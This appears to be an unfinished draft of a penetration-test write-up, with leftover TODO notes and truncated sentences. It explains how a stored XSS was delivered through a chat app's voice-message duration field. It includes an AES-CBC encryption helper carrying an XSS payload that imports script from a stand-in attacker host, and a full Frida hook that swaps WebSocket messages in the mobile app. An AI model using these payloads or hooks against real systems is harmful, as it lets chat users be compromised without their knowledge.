Frida, AES and WebSockets: Turning a Mobile-only Feature into Stored Web XSS
Table of content
notes
maybe mention it has also an app in the beggining, which mirros the web app?
Introduction
During an engagement, I found that the length of a voice message in a chat ended in an innerHTML sink. However, exploiting it turned out to be an adventure on itself, involving reverse engineering an implementation of AES encryption, hooking WebSocket traffic with Frida and simulating a physical device.
A simple innerHTML sink
This started the way a lot of findings do: staring at JavaScript and looking for something interesting.
This target had a lot of features, one of them being a chat. You could have two person chats or group chats, and if you enabled the option, anyone could join the group chats. While analyzing the client-side source code, more specifically at an innerHTML sink, I noticed that the time length of voice messages, meant to display the audio clip's duration, was rendered without sanitization. Good, but first of all, we need to understand if we can manipulate this field.
Something that I noticed after a while was that there was no option to send voice message anywhere. I was feeling confused. Until I noticed that, despite the interfaces being the same, if the app considered your device to be mobile, it displayed the voice message button. Ok, so there are various way we can work with this limitation, but for now we can just open devtools and click "Toggle device toolbar" to simulate a mobile phone.
Everything is Encrypted
It did not took much time to discover that chat interations were sent over WebSockets and encrypted. But encryption was probably done client-side, so I was really confident I could verify it. And so, after some time reverse engineering and reading JavaScript, I concluded that every interactions was AES-CBC encrypted with session-specific keys. Basically:
- Key (x): dynamic key, unique per session
- IV (y): initialization vector, also unique per session
- Mode: AES-CBC with PKCS7 padding
This mean that, to understand what was happening and possibly inject my payload, I needed to:
- Obtain the session's AES key and IV
- Decrypt a valid message and understand the content
- After that, modify the field I need
- Enrypt it again
- Replace a legitimate encrypted message with mine, or check if I can manually send a message
Understanding the Message Flow
Since we absolutely need to understand how messages, and specifically voice messages work, it was time for some combination of static analysis and runtime debugging! After a long while, I mapped out the following:
- User records voice message either in the app/mobile browser
- App uploads audio file, gets a URL
- App create JSON object with metadata, which including a
durationfield - JSON is encrypted with session keys
- The encrypted payload is sent via WebSocket
- Server relays it to the recipient
- Recipient decrypts and renders, which includes the vulnerbale
innerHTML
So, the encryption happened client-side and the server just relayed the encrypted blobbs. This meant that if I could intercept befor encryption or modify the encrypted output, I could inject anything.
Extracting Session Keys
Where do the AES keys come from? After more reverse engineering, I found they're exchanged during sessoin setup (seems simple, but took some time to put everything togehter):
- User creates or joins a group chat
- Attacker calls
endpoint1and servers returns value ofvariable1 - Attacker calls
/endpoint2with thevariable1value - Server responds with key and IV
Now that I had the keys, it was time to decrypt the messages and check what was being sent over WebSockets
I created two functions to help me, one to encrypt payloads and other to decrypt. They looked like:
TODO: HERE SHOULD BE THE DECRYPT FUNCTION
import CryptoJS from 'crypto-js';
function aesEncrypt(plaintext, key, iv) {
let keyBytes = CryptoJS.enc.Utf8.parse(key);
let ivBytes = CryptoJS.enc.Utf8.parse(iv);
let encrypted = CryptoJS.AES.encrypt(plaintext, keyBytes, {
iv: ivBytes,
mode: CryptoJS.mode.CBC,
padding: CryptoJS.pad.Pkcs7
});
return encrypted.toString(); // Base64
}
const x = 'something'; // Session key
const y = 'somethingelse'; // Session IV
const payload = JSON.stringify({
url: "...",
messageId: "...",
duration: "100</span><img src=x onerror=import('//ATTACKER.com')><span>",
[ other fields ]
});
console.log(aesEncrypt(payload, x, y));
And the inverse to decrypt. // HERE SHOULD BE and the inverse to encrypt
Crafting the Payload
The original voice message decrypted JSON looked something like this:
{
"url": "https://target.com/uploads/voicemessage123",
"duration": "5",
"messageId": "123456",
[ other fields ]
}
Frida to the Rescue
Ok, we can get our payload into a message and encrypt it. But how to actually get it in to the WebSocket stream?
Intercepting WebSockets isnt as straightforward as HTTP using proxies like Burp or Caido. Additionally, this require an actual voice message being sent, so just sending our encrypted message in WebSockets wouldn't work. So, the target had a mobile app which was basically the same environment as the web interface. As such, I could create a frida script that intercepts the WebSocket layer and swaps the encrypted payload
So, that's essently what I did
Java.perform(function () {
const RealWebSocket = Java.use("okhttp3.internal.ws.RealWebSocket");
RealWebSocket.send.overload('java.lang.String').implementation = function (message) {
console.log("[->] Original:", message);
if (message.startsWith('42')) {
try {
let dataArray = JSON.parse(message.substring(2));
const eventName = dataArray[0];
if (eventName === 'q_send_im_msg_ts') {
let innerPayload = JSON.parse(dataArray[1]);
// Replace with our malicious encrypted payload
innerPayload.msgData = "JdAHG/Wvsmcj6dWerfH0VKMp...";
dataArray[1] = JSON.stringify(innerPayload);
const modified = "42" + JSON.stringify(dataArray);
console.log("[<-] Modified:", modified);
return this.send(modified);
}
} catch (e) {
console.log("[!] Error:", e);
}
}
return this.send(message);
};
});
Now run it with `frida -U -f com.target.app -l hook.js,and when I record a voice message inside a chat, it will intercept it, swap the encrypted part with my XSS payload and send it. The server will accept it, relay to the victim and XSS fire!
Simulating physical device part
At this point I had a working XSS, but to create a public group chat, I had to...
I was too deep into this to just let it go. As such, initially I spent a lot of time diggin gthrough JavaScript and Java from the mobile app to understand how actually devices were registered. I finally managed to understand the http request needed for that but I was missing something: a real device id.
I had no way to have one, but I was determined. I spent a lot of time diggint thought user forums, setup guides, any kind of public discussion. And finally, in an obscure troubleshooting post, someone had shared their device ID while asking for help
Note: device ids are not sensitive, private or individual. They are just ask an id of the device model which is the same for every model
As such, with a device ID, I could now simulate a device connection. I registered a device to my test account, created a public group chat. Now the attack was complete